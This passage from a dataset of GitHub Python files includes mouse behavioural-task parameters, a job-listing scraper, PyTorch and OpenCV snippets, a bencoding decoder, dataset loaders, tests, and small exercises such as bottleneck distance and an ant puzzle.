{'subject':'test059','experimenter':'santiago'}\npardict.update(switchBlocksMode)\npardict.update(frequencySet6to19)\npardict.update({'punishTimeEarly':0,'punishSoundAmplitude':0.01})\npardict.update(fixIntensity)\ntest059 = pardict.copy()\n'''\n#started on psycurve 2015-11-28\ntest087frequency = {'lowFreq':6200,'midFreq':10000,'highFreq':18000}\npardict = {'subject':'test087','experimenter':'santiago'}\npardict.update(switchBlocksMode)\npardict.update(test087frequency)\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.03})\npardict.update(fixIntensity)\ntest087 = pardict.copy()\n'''\n#test087frequency = {'lowFreq':8900,'midFreq':9100,'highFreq':9900}\ntest087frequency = {'lowFreq':9000,'midFreq':9200,'highFreq':9700}\npardict = {'subject':'test087','experimenter':'santiago'}\npardict.update(psyCurveMidBound)\npardict.update(test087frequency)\npardict.update(fixIntensity)\npardict.update({'punishTimeEarly':0,'punishSoundAmplitude':0.01})\ntest087 = pardict.copy()\n\ntest089frequency = {'lowFreq':6200,'midFreq':9000,'highFreq':17000}\npardict = {'subject':'test089','experimenter':'santiago'}\npardict.update(switchBlocksMode)\n#pardict.update({'currentBlock':'low_boundary'})\npardict.update(test089frequency)\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.03})\npardict.update({'delayToTargetMean':0.13, 'delayToTargetHalfRange':0.02})\npardict.update(fixIntensity)\ntest089 = pardict.copy()\n\n\nfirstAdapMice = {'delayToTargetMean':0.2,'trialsPerBlock':300}\n'''\npardict = {'subject':'adap002','experimenter':'santiago'}\npardict.update(firstAdapMice)\npardict.update(frequencySet6to19)\npardict.update({'punishTimeEarly':0.2,'punishSoundAmplitude':0.03})\npardict.update({'punishTimeError':4})\nadap002 = pardict.copy()\n'''\n#adap004frequency = {'lowFreq':6200,'midFreq':10000,'highFreq':19200}\nadap004frequency = {'lowFreq':7200,'midFreq':10000,'highFreq':13600}#updated 2015-12-19\npardict = {'subject':'adap004','experimenter':'santiago'}\npardict.update(psyCurveMidBound)\npardict.update(adap004frequency)\npardict.update(fixIntensity)\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.03})\npardict.update({'punishTimeError':4})\nadap004 = pardict.copy()\n'''\n#Switch to psychometric curve as of 2015-12-02\npardict = {'subject':'adap004','experimenter':'santiago'}\npardict.update(firstAdapMice)\npardict.update(adap004frequency)\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.03})\npardict.update({'punishTimeError':4})\npardict.update(fixIntensity)\nadap004 = pardict.copy()\n'''\n\nadap002frequency = {'lowFreq':6800,'midFreq':11000,'highFreq':16000}\n\npardict = {'subject':'adap002','experimenter':'santiago'}\npardict.update(psyCurveMidBound)\npardict.update(adap002frequency)\npardict.update(fixIntensity)\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.03})\npardict.update({'punishTimeError':4})\nadap002 = pardict.copy()\n\n\npardict = {'subject':'adap010','experimenter':'santiago'}\npardict.update(switchBlocksMode)\npardict.update(frequencySet5to24)\npardict.update(fixIntensity)\n#pardict.update({'antibiasMode':'repeat_mistake'})\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.01})\npardict.update({'punishTimeError':4})\nadap010 = pardict.copy()\n\nadap3 = psyCurveMidBound\nadap3.update({'delayToTargetMean':0.2})\n\npardict = 
{'subject':'adap015','experimenter':'santiago'}\npardict.update(adap3)\npardict.update({'lowFreq':6200,'highFreq':17000})\npardict.update(fixIntensity)\n#pardict.update({'antibiasMode':'repeat_mistake'})\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.01})\nadap015 = pardict.copy()\n\npardict = {'subject':'adap013','experimenter':'santiago'}\npardict.update(adap3)\npardict.update({'lowFreq':9000,'highFreq':12000})\npardict.update(fixIntensity)\n#pardict.update({'antibiasMode':'repeat_mistake'})\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.01})\nadap013 = pardict.copy()\n\npardict = {'subject':'adap017','experimenter':'santiago'}\npardict.update(adap3)\npardict.update({'lowFreq':7000,'highFreq':17000})\npardict.update(fixIntensity)\n#pardict.update({'antibiasMode':'repeat_mistake'})\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.01})\nadap017 = pardict.copy()\n\n#######################################################################################################\n#######################################################################################################\n#FOR REWARD CHANGE MICE\n#######################################################################################################\n#######################################################################################################\n\n#'currentBlock':'more_right',\npsyCurveChangeReward = {'punishTimeError':4,\n 'delayToTargetMean':0.2,\n 'psycurveMode':'off',\n 'automationMode':'left_right_left',\n 'punishTimeEarly':0.5,\n 'punishSoundAmplitude':0.01,\n 'targetIntensityMode':'fixed',\n 'baseWaterValveL':0.015,\n 'baseWaterValveR':0.015,\n 'factorWaterValveL':4,\n 'factorWaterValveR':4,\n 'currentBlock':'more_left'}\n\n\npardict = {'subject':'adap015','experimenter':'billy'}\npardict.update(psyCurveChangeReward)\npardict.update({'trialsPerBlock':150})\npardict.update({'lowFreq':6200,'highFreq':17000})\nadap015reward = pardict.copy()\n\npardict = {'subject':'adap013','experimenter':'billy'}\npardict.update(psyCurveChangeReward)\npardict.update({'trialsPerBlock':150})\npardict.update({'lowFreq':8000,'highFreq':14000})\nadap013reward = pardict.copy()\n\npardict = {'subject':'adap017','experimenter':'billy'}\npardict.update(psyCurveChangeReward)\npardict.update({'trialsPerBlock':150})\npardict.update({'lowFreq':7000,'highFreq':17000})\nadap017reward = pardict.copy()\n\n\n\n#######################################################################################################\n#######################################################################################################\n\n\npardict = {'subject':'adap020','experimenter':'santiago'}\npardict.update(switchBlocksMode)\n#pardict.update(frequencySet6to19)\npardict.update({'lowFreq':6200,'midFreq':12000,'highFreq':19200})\npardict.update({'currentBlock':'low_boundary'})\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.01})\npardict.update(fixIntensity)\npardict.update({'punishTimeError':4})\npardict.update({'trialsPerBlock':250})\nadap020 = pardict.copy()\n\n#pardict = {'subject':'adap024','experimenter':'santiago'}\n#pardict.update(switchBlocksMode)\n#pardict.update(frequencySet6to19)\n#pardict.update({'currentBlock':'low_boundary'})\n#pardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.01})\n#pardict.update(fixIntensity)\n#pardict.update({'punishTimeError':4})\n#pardict.update({'trialsPerBlock':200})\n#adap024 = pardict.copy()\n\npardict = 
{'subject':'adap024','experimenter':'santiago'}\npardict.update(adap3)\npardict.update({'lowFreq':8500,'highFreq':13000})\npardict.update(fixIntensity)\n#pardict.update({'antibiasMode':'repeat_mistake'})\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.01})\nadap024 = pardict.copy()\n\n#pardict = {'subject':'adap021','experimenter':'santiago'}\n#pardict.update(switchBlocksMode)\n#pardict.update(frequencySet6to19)\n##pardict.update({'currentBlock':'high_boundary'})\n#pardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.03})\n##pardict.update(fixIntensity)\n#pardict.update({'punishTimeError':4})\n#pardict.update({'trialsPerBlock':400})\n#adap021 = pardict.copy()\n\npardict = {'subject':'adap021','experimenter':'santiago'}\npardict.update(adap3)\npardict.update({'lowFreq':6200,'highFreq':19200})\n#pardict.update(fixIntensity)\n#pardict.update({'antibiasMode':'repeat_mistake'})\npardict.update({'punishTimeEarly':0.5,'punishSoundAmplitude':0.03})\nadap021 = pardict.copy()\n","repo_name":"sjara/jaratest","sub_path":"billy/scripts/params.billy.py","file_name":"params.billy.py","file_ext":"py","file_size_in_byte":10856,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"73117838567","text":"'''\nimport sys\n#Page 115\nscript, input_encoding, error = sys.argv #Why do we need use name of module sys.\n\ndef main(language_file, encoding, errors):\n line = language_file.readline() #Takes line from object\n\n if line:\n print_line(line, encoding, errors)\n return main(language_file, encoding, errors)\n\n#Function which prints line\ndef print_line(line, encoding, errors):\n next_lang = line.strip() #Q: What .strip() does A: https://www.programiz.com/python-programming/methods/string/strip\n raw_bytes = next_lang.encode(encoding, errors = errors) # .encode()\n cooked_string = raw_bytes.decode(encoding, errors = errors) # .decode()\n\n print(raw_bytes, \"<===>\", cooked_string)\n\n#1. converting lang..txt to lang.. 
object\nlanguages = open(\"languages.txt\", encoding = \"utf-8\")\n\nmain(languages, input_encoding, error)\n'''\n\n\nimport sys\n\nscript, txt_file = sys.argv\n\ndef main(ob_f, encoding, er):\n    line = string_printer(ob_f, encoding, er)\n    if line:  # keep recursing until the end of the file\n        return main(ob_f, encoding, er)\n\ndef string_printer(ob, encode, err):\n    single_string = ob.readline()\n    if not single_string:  # end of file reached\n        return ''\n    raw_byte = single_string.encode(encoding=encode, errors=err)\n    cooked_byte = raw_byte.decode(encode, errors=err)\n\n    print(cooked_byte, \"<===>\", raw_byte)\n    return single_string\n","repo_name":"MasonTwoK/Python_Hard_way_exercises","sub_path":"ex23/ex23.py","file_name":"ex23.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24381190186","text":"import requests\nimport bs4\nimport json\nfrom threading import Thread\n\n\ndef extracting_information(tab,out):\n\n    list_of_links = [] # this is a list for all the links in a single department\n    [list_of_links.append(i.get('href')) for i in soup.select('div {} .clickable-row a'.format(tab))]\n\n    for dep_link in list_of_links:\n        request = requests.get(dep_link)\n        soup2 = bs4.BeautifulSoup(request.text, 'lxml')\n\n        description_of_job = {'title': '', 'location': '', 'description': [], 'qualification': [], 'posted by': ''}\n\n        description_of_job['title'] = soup2.find_all(class_='job-title')[0].text\n        description_of_job['location'] = soup2.find_all('span', class_='job-detail')[0].text\n        [description_of_job['description'].append(de.text) for de in soup2.select('#st-jobDescription .wysiwyg ul li')]\n        [description_of_job['qualification'].append(qu.text) for qu in soup2.select('#st-qualifications .wysiwyg ul li')]\n        try:\n            description_of_job['posted by'] = soup2.select('.details h3')[0].text\n        except IndexError:\n            description_of_job['posted by'] = 'NULL'\n\n        output[out].append(description_of_job)\n\n\nreq = requests.get('https://www.cermati.com/karir')\nsoup = bs4.BeautifulSoup(req.text, 'lxml')\n\noutput = {}\noutput1 = [] # creating the list for the departments for looping purpose\ndep = soup.find_all('h4', class_='tab-title') # selecting the departments code and adding into the output dictionary\nfor i in dep: # selecting only the text from that code\n    output[i.text] = []\n    output1.append(i.text)\n\ntabs = [] # this is a list of id's of departments from html code\n[tabs.append(i.get('href')) for i in soup.select('div .col-xs-2 a')]\n\nli = []\n\nfor i in range(len(tabs)):\n    li.append(Thread(target=extracting_information, args=(tabs[i], output1[i],))) # creating a thread for each department\n    li[i].start() # starting the thread simultaneously\n\nfor i in range(len(li)):\n    li[i].join() # making the main thread to wait for all the other threads we had started\n\nprint(output)\nwith open('solution.json', 'w') as creating_file:\n    json.dump(output, creating_file)\n","repo_name":"vkjangid/cermati_assignment","sub_path":"solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
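# Note (added annotation, not part of the scraped file above): one Thread per
# department is fine for a handful of tabs; for larger lists, a pool bounds the
# concurrency. A minimal sketch assuming the same extracting_information(tab, out)
# signature from the scraper above:
#
# from concurrent.futures import ThreadPoolExecutor
# with ThreadPoolExecutor(max_workers=8) as pool:
#     for tab, out in zip(tabs, output1):
#         pool.submit(extracting_information, tab, out)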
 +{"seq_id":"31005960788","text":"import torch\nfrom torch import nn\nfrom torch.utils.tensorboard import SummaryWriter\n\n\nclass xxNet(nn.Module):\n    def __init__(self, input_channels, output_channels):\n        super(xxNet, self).__init__()\n        # Initialize some parameters (opt)\n        self.input_channels = input_channels\n        self.output_channels = output_channels\n\n        # Layers needed in the network (they can be written one by one; heavily repeated parts can be wrapped into an nn.Sequential module)\n        self.model = nn.Sequential(\n            nn.Conv2d(input_channels, 64, 5, 1, 2),\n            nn.MaxPool2d(2),\n            nn.Conv2d(64, 128, 5, 1, 2),\n            nn.MaxPool2d(2),\n            nn.Conv2d(128, 256, 5, 1, 2),\n            nn.MaxPool2d(2),\n            nn.Conv2d(256, 512, 5, 1, 2),\n            nn.MaxPool2d(2),\n        )\n\n    # Forward pass\n    def forward(self, x):\n        x = self.model(x)\n        return x\n\n\n# Create an instance to check that the model is wired correctly; it also lets you work backwards to figure out layer parameters, e.g. for a linear layer\nif __name__ == '__main__':\n    writer = SummaryWriter(\"../logs/model_logs\")\n\n    net = xxNet(input_channels=1, output_channels=2)\n    print(net)\n\n    input = torch.ones((1, 3, 32, 32))\n    output = net(input)\n    print(output.shape)\n\n    writer.add_graph(net, input)\n    writer.close()","repo_name":"Aiden-Kan/dl_template","sub_path":"model/xxNet.py","file_name":"xxNet.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38133782907","text":"import cv2\nimport os.path\nimport glob\nimport numpy as np\ndef img_cut_multiple(jpgfile,outdir):\n    img=cv2.imread(jpgfile,cv2.IMREAD_ANYCOLOR)\n    img=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n    imgInfo=img.shape\n    height=imgInfo[0]\n    width=imgInfo[1]\n    pts1 = np.float32([[0,0],[0,height-1],[width-1,height-1],[width-1,0]])\n    pts2 = np.float32([[300,300],[0,height-1],[width-100,height-100],[width-1,0]])\n    M = cv2.getPerspectiveTransform(pts1, pts2)\n    dst = cv2.warpPerspective(img, M, (2500, 2500))\n\n    cv2.imwrite(os.path.join(outdir, os.path.basename(jpgfile)), dst)\n\n\nfor jpgfile in glob.glob(r'C:\\Users\\Joker\\Desktop\\DL\\aa\\y\\*.jpg'):\n    img_cut_multiple(jpgfile, r'C:\\Users\\Joker\\Desktop\\cv2')\n","repo_name":"AxCJoe/PythonStartLab","sub_path":"opencv画像処理/射影変換処理.py","file_name":"射影変換処理.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39183480085","text":"\n\nclass Decoding:\n    def __init__(self, filename):\n        self.final_list = []\n        self.filename = filename  # store the path before opening it\n        self.in_file = open(self.filename, \"r\")\n\n    def decode_string(self, length):\n        string_read = \"\"\n        if not(length == 0):\n            for count in range(length):\n                string_read += self.in_file.read(1)\n        return string_read.encode('ascii')\n\n    def decode_int(self):\n        int_ascii_read = \"\"\n        while True:\n            character = self.in_file.read(1)\n            if character == 'e':\n                break\n            int_ascii_read += character\n        return int(int_ascii_read)\n\n    def decode(self):\n        while True:\n            character = self.in_file.read(1) #read 1 byte a time\n            if not character: #end of file\n                break\n            if character.isdigit():\n                self.final_list.append(self.decode_string(int(character)))\n            if character == 'l':\n                self.final_list.append(self.decode_list())\n            if character == 'd':\n                self.final_list.append(self.decode_dict())\n            if character == 'i':\n                self.final_list.append(self.decode_int())","repo_name":"mmshress/PyBitTorrent","sub_path":"bencoding.py","file_name":"bencoding.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42011912868","text":"import numpy as np\r\nimport os\r\n\r\n\r\ndef getPSNR(x, y):\r\n    max_val = 1.0\r\n    mse = np.mean(np.square(x - y))\r\n    psnr = 10 * np.log10(max_val / mse + 1e-8)\r\n    return psnr\r\n\r\n\r\ndef getSAM(x, y):\r\n    x_y = np.sum(np.multiply(x, y), axis=1)\r\n    x_norm = np.sqrt(np.sum(x ** 2, axis=1))\r\n    y_norm = np.sqrt(np.sum(y ** 2, axis=1))\r\n\r\n    cosin_value = x_y / (x_norm * y_norm + 1e-8)\r\n    cosin_value = np.arccos(np.clip(cosin_value, 
-1, 1))\r\n    angle = cosin_value / np.pi * 180\r\n\r\n    return np.mean(angle)\r\n\r\n\r\ndef checkFile(path):\r\n    '''\r\n    create the directory if the path does not exist\r\n    :param path:\r\n    :return:\r\n    '''\r\n    if not os.path.exists(path):\r\n        os.makedirs(path)\r\n\r\n\r\ndef standard(X):\r\n    max_value = np.max(X)\r\n    min_value = np.min(X)\r\n    if max_value == min_value:\r\n        return X\r\n    return (X - min_value) / (max_value - min_value)\r\n","repo_name":"shendb2022/HTD-IRN","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"24361163179","text":"\"\"\"Helmholtz dataset\"\"\"\nimport os\nimport torch\nfrom ffcv.loader import Loader, OrderOption\nfrom ffcv.fields.decoders import NDArrayDecoder\nfrom ffcv.transforms import ToTensor\nfrom wavebench import wavebench_dataset_path\n\nhelmholtz_dataset_path = os.path.join(\n    wavebench_dataset_path, \"time_harmonic/\")\n\ndef get_dataloaders_helmholtz(\n    kernel_type='isotropic',\n    frequency=10,\n    train_batch_size=1,\n    eval_batch_size=1,\n    num_train_samples=49000,\n    num_val_samples=500,\n    num_test_samples=500,\n    num_workers=1,\n    is_elastic=False\n    ):\n  \"\"\"Prepare loaders of the Helmholtz dataset.\n\n  Args:\n    kernel_type: can be `isotropic` or `anisotropic`.\n    frequency: can be 10, 15, 20, 40 [Hz].\n    train_batch_size (int, optional): batch size for training.\n      Defaults to 1.\n    eval_batch_size (int, optional): batch size for validation and testing.\n      Defaults to 1.\n    num_train_samples (int, optional): number of training samples.\n      Defaults to 49000.\n    num_val_samples (int, optional): number of validation samples.\n      Defaults to 500.\n    num_test_samples (int, optional): number of test samples.\n      Defaults to 500.\n    num_workers (int, optional): number of workers for data loading.\n    is_elastic (bool, optional): load the elastic-wave variant.\n      Defaults to False.\n  \"\"\"\n\n  sum_samples = num_train_samples + num_val_samples + num_test_samples\n  assert sum_samples <= 50000\n\n  batch_sizes = {\n    'train': train_batch_size,\n    'val': eval_batch_size,\n    'test': eval_batch_size\n  }\n\n  generator = torch.Generator().manual_seed(42)\n  indices = torch.randperm(sum_samples, generator=generator).tolist()\n\n  splitted_indices = {\n    'train': indices[:num_train_samples],\n    'val': indices[num_train_samples:num_train_samples+num_val_samples],\n    'test': indices[num_train_samples+num_val_samples:]\n  }\n\n  if is_elastic:\n    wavetype = 'elastic'\n    if kernel_type != 'anisotropic':\n      raise ValueError('Elastic kernel_type must be anisotropic')\n  else:\n    wavetype = 'acoustic'\n\n  dataloaders = {\n    x: Loader(\n      f'{wavebench_dataset_path}/time_harmonic/{wavetype}/{kernel_type}_{wavetype}_{int(frequency)}.beton',\n      batch_size=batch_sizes[x],\n      num_workers=num_workers,\n      order=OrderOption.RANDOM if x == 'train' else OrderOption.SEQUENTIAL,\n      indices=splitted_indices[x],\n      pipelines={\n        'input': [NDArrayDecoder(), ToTensor()],\n        'target': [NDArrayDecoder(), ToTensor()]},\n      ) for x in ['train', 'val', 'test']}\n\n  return dataloaders\n\n","repo_name":"wavebench/wavebench","sub_path":"wavebench/dataloaders/helmholtz_loader.py","file_name":"helmholtz_loader.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
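# A minimal usage sketch for the loader above (added annotation; the argument values
# are illustrative, taken from the function's own signature):
# loaders = get_dataloaders_helmholtz(kernel_type='isotropic', frequency=10,
#                                     train_batch_size=4, num_workers=2)
# for input_batch, target_batch in loaders['train']:
#     ...  # input/target tensors decoded from the .beton file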
 +{"seq_id":"71742723047","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nfrom human_pose_util.animation.stateful import Stateful, StatefulAnimator\nfrom glumpy.graphics.collections import SegmentCollection\n\n_side_index = {'l': 0, 'r': 1, 'c': 2}\n_n_sides = len(_side_index)\n\n\ndef joint_side(joint):\n    if joint[:2] == 'l_':\n        return 'l'\n    elif joint[:2] == 'r_':\n        return 'r'\n    else:\n        return 'c'\n\n\nclass LimbCollection(Stateful):\n    \"\"\"Stateful object with pose as state.\"\"\"\n\n    def __init__(self, skeleton, pose, transform, viewport, linewidth=2.0):\n        children = [[] for k in _side_index]\n        parents = [[] for k in _side_index]\n\n        for c in range(skeleton.n_joints):\n            p = skeleton.parent_index(c)\n            if p is not None:\n                side = joint_side(skeleton.joint(c))\n                index = _side_index[side]\n                children[index].append(c)\n                parents[index].append(p)\n        self.children = children\n        self.parents = parents\n\n        self.body_segments = [\n            SegmentCollection(mode=\"agg\",\n                              transform=transform,\n                              viewport=viewport,\n                              linewidth='local',\n                              color='local') for _ in range(3)\n        ]\n\n        for i, segment in enumerate(self.body_segments):\n            c = children[i]\n            if len(c) > 0:\n                p = parents[i]\n                segment.append(pose[c], pose[p], linewidth=linewidth)\n\n        self.body_segments[_side_index['l']]['color'] = 0, 0, 1, 1\n        self.body_segments[_side_index['r']]['color'] = 1, 0, 0, 1\n        # self.body_segments[side_index['c']]['color'] = 0, 0, 0, 1\n        super(LimbCollection, self).__init__(pose)\n\n    def draw(self):\n        for segments in self.body_segments:\n            segments.draw()\n\n    @property\n    def pose(self):\n        return self.state\n\n    @pose.setter\n    def pose(self, new_pose):\n        self.state = new_pose\n\n    def update(self, old_state, new_state):\n        for i, segment in enumerate(self.body_segments):\n            segment['P0'] = np.repeat(new_state[self.children[i]], 4, axis=0)\n            segment['P1'] = np.repeat(new_state[self.parents[i]], 4, axis=0)\n\n\ndef limb_collection_animator(limb_collection, poses, fps):\n    n_frames = len(poses) - 1\n\n    def state_fn(time):\n        f = time * fps % n_frames\n        f0 = int(f)\n        frac = f % 1\n        return (1 - frac) * poses[f0] + frac * poses[f0 + 1]\n\n    return StatefulAnimator(limb_collection, state_fn)\n\n\ndef skeleton_animator(skeleton, poses, fps, transform, viewport, linewidth=2.0):\n    limb_collection = LimbCollection(skeleton,\n                                     poses[0],\n                                     transform,\n                                     viewport,\n                                     linewidth=linewidth)\n    return limb_collection_animator(limb_collection, poses, fps)\n","repo_name":"jackd/human_pose_util","sub_path":"human_pose_util/animation/skeleton_vis.py","file_name":"skeleton_vis.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"53"} +{"seq_id":"22545547678","text":"import pandas as pd\r\nfrom sklearn.preprocessing import OneHotEncoder\r\n\r\ndata = pd.read_csv(\"../winequality-red.csv\")\r\n\r\nhot_encoder = OneHotEncoder()\r\n\r\nhot_encoder.fit(data)\r\ndata2 = hot_encoder.transform(data)\r\nprint(data2.toarray())\r\n\r\nprint(\"Reason: it transforms these categories into a set of binary columns (dummy variables), where each column represents a unique category.\")","repo_name":"diegojoel301/Examen-primer-parcial-INF-354","sub_path":"p4/binario.py","file_name":"binario.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2512560854","text":"import datetime\nimport unittest\nfrom unittest import mock\n\nimport singer_sdk.io_base\nimport time_machine\nfrom target_elasticsearch.sinks import template_index, build_fields\n\n\ndef test_template_index():\n    dt = datetime.datetime(2017, 11, 28, 23, 55, 59, 342380)\n    assert \"\" == template_index(\"\", \"\", {})\n    assert \"animals-latest\" == 
template_index(\"animals\", \"{{ stream_name }}-latest\", {})\n assert \"animals-latest\" == template_index(\n \"animals\",\n \"{{ stream_name }}-latest\",\n {\"timestamp\": dt.isoformat()},\n )\n assert \"animals-2017\" == template_index(\n \"animals\",\n \"{{ stream_name }}-{{ to_yearly(timestamp) }}\",\n {\"timestamp\": dt.isoformat()},\n )\n assert \"animals-2017.11\" == template_index(\n \"animals\",\n \"{{ stream_name }}-{{ to_monthly(timestamp) }}\",\n {\"timestamp\": dt.isoformat()},\n )\n assert \"2017.11.28\" == template_index(\n \"animals\",\n \"{{ to_daily(timestamp) }}\",\n {\"timestamp\": dt.isoformat()},\n )\n with time_machine.travel(dt):\n assert \"2017.11.28\" == template_index(\n \"\",\n \"{{ current_timestamp_daily }}\",\n {},\n )\n assert \"2017.11\" == template_index(\n \"\",\n \"{{ current_timestamp_monthly }}\",\n {},\n )\n assert \"2017\" == template_index(\n \"\",\n \"{{ current_timestamp_yearly }}\",\n {},\n )\n\n\ndef test_build_fields():\n logger = singer_sdk.io_base.logger\n assert {} == build_fields(\"\", {}, {}, logger)\n record = {\n \"id\": 1,\n \"created_at\": \"some tz\",\n \"some_nesting\": {\"test\": \"bar\"},\n \"some_array\": [\"biz\", \"buz\"],\n }\n assert {\"timestamp\": \"some tz\"} == build_fields(\n \"animals\", {\"animals\": {\"timestamp\": \"created_at\"}}, record, logger\n )\n assert {\"hup\": \"bar\"} == build_fields(\n \"animals\", {\"animals\": {\"hup\": \"some_nesting.test\"}}, record, logger\n )\n assert {\"hup\": \"biz\"} == build_fields(\n \"animals\", {\"animals\": {\"hup\": \"some_array[0]\"}}, record, logger\n )\n\n\nclass SinkTests(unittest.TestCase):\n @mock.patch(\"target_elasticsearch.sinks.ElasticSink\")\n def test_config(self, mock_es):\n pass\n","repo_name":"dtmirizzi/target-elasticsearch","sub_path":"tests/unit/test_target.py","file_name":"test_target.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"7964512970","text":"import nose\nimport support\nimport support.tools\nfrom pika.adapters import SelectConnection\n\n\nclass TestAsyncSendGet(support.tools.AsyncPattern):\n\n @nose.tools.timed(2)\n def test_send_and_get(self):\n self.confirmed = False\n self.connection = self._connect(SelectConnection, support.PARAMETERS)\n self.connection.ioloop.start()\n if not self.confirmed:\n assert False, 'Messages did not match.'\n pass\n\n def _on_channel(self, channel):\n self.channel = channel\n self._queue_declare()\n\n def _on_queue_declared(self, frame):\n test_message = self._send_message()\n\n def check_message(channel_number, method, header, body):\n self.confirmed = (body == test_message)\n self.connection.add_on_close_callback(self._on_closed)\n self.connection.close()\n\n self.channel.basic_get(callback=check_message, queue=self._queue)\n","repo_name":"inean/pika","sub_path":"tests/functional/send_get_test.py","file_name":"send_get_test.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"30993949978","text":"import numpy as np\nfrom sympy import Abs, symbols, S, Max, Min, solve\nfrom sympy.abc import x, y\n\nINPUT_FROM_USER = False\n\n#-------------------\n#BOTTLENECK DISTANCE\n#-------------------\n\n#Numpy Bottleneck (no symbolic calculus)\ndef bottleneck(p,q):\n #p, q points the upper diagonal half-plane of R^2\n max1 = np.max([np.abs(p[0]-q[0]),np.abs(p[1]-q[1])])\n max2 = np.max([(p[1]-p[0])/2, (q[1]-q[0])/2])\n return 
np.min([max1,max2])\n\n#Sympy Bottleneck (with symbolic calculus)\ndef symBottleneck(u,v):\n    #u, v points the upper diagonal half-plane of R^2\n    p0,p1,q0,q1 = symbols(\"p0,p1,q0,q1\")\n    m1 = Max(Abs(p0-q0), Abs(p1-q1))\n    m2 = Max((p1-p0)/2, (q1-q0)/2)\n    return Min(m1,m2).subs({p0:u[0],p1:u[1],q0:v[0],q1:v[1]})\n\n#----------------\n#POSITION THEOREM\n#----------------\n\n#Intersection between filtering line and contour\ndef intersImproper(va,f):\n    #Intersects r_{(a,b)} with contour of equation f\n    b = symbols(\"b\")\n    equations = [f, (1-va)*x - va*y - b]\n    return solve(equations, x, y, dict=True)\n\ndef main():\n    \"\"\" Main program \"\"\"\n    if INPUT_FROM_USER:\n        notvalid = True\n        while notvalid:\n            p0,p1 = input(\"Enter point p coordinates:\").split()\n            if p0 > p1:\n                print(\"The point p does not belong to the upper half-plane. Choose another point.\")\n            else: \n                notvalid = False\n        notvalid = True\n        while notvalid:\n            q0,q1 = input(\"Enter point q coordinates:\").split()\n            if q0 > q1:\n                print(\"The point q does not belong to the upper half-plane. Choose another point.\")\n            else: \n                notvalid = False\n        p = [int(p0),int(p1)]\n        q = [int(q0),int(q1)]\n\n        print(bottleneck(p,q))\n\n    bot = symBottleneck([0,1],[0,2])\n    print(bot)\n\n    x1,x2,x3,x4,x5,b = symbols(\"x1,x2,x3,x4,x5,b\")\n    f = x**2 + y**2 - x5**2\n    print(intersImproper(1/2,f))\n\nif __name__ == \"__main__\":\n    main()
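# Worked check of the bottleneck formula above (added annotation): for p = (0, 1) and
# q = (0, 2): max1 = max(|0-0|, |1-2|) = 1 and max2 = max((1-0)/2, (2-0)/2) = 1, so the
# result is min(1, 1) = 1, matching what symBottleneck([0,1],[0,2]) prints in main().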
","repo_name":"emosig/Bottleneck","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73439200807","text":"#If at any moment it reaches position -1 or position N, it falls off the log! \n\n#P and takes a step to the right, it will be at position P+1\n#If the step is to the left, it will be at position P-1.\n#If at any moment it reaches position -1 or position N, it falls off the log! A step takes one second to complete, \n#and the ant is always moving.\n\n#Considering that the ant always follows the worst possible \n#sequence of steps, choose a starting position that \n#maximizes the time the ant stays \n#on the log. Print this time.\n\n#For each case, print the maximum time that the \n#little ant can stay on the log.\n\nt = int(input())\n\ncount1 = 0\ncount2 = 0\n\nfor i in range(0, t):\n    d = int(input())\n    d1 = d//2\n    d2 = d//2\n    while d1 > 0:\n        d1 -= 1\n        count1 += 1\n    while d2 < d:\n        d2 += 1\n        count2 += 1\n    \n    if d1 < d2:\n        print(count1)\n    else:\n        print(count2)","repo_name":"gabrielreiss/URI","sub_path":"1612.py","file_name":"1612.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30708172413","text":"# Read configuration information\nimport configparser\nimport os\nproDir = 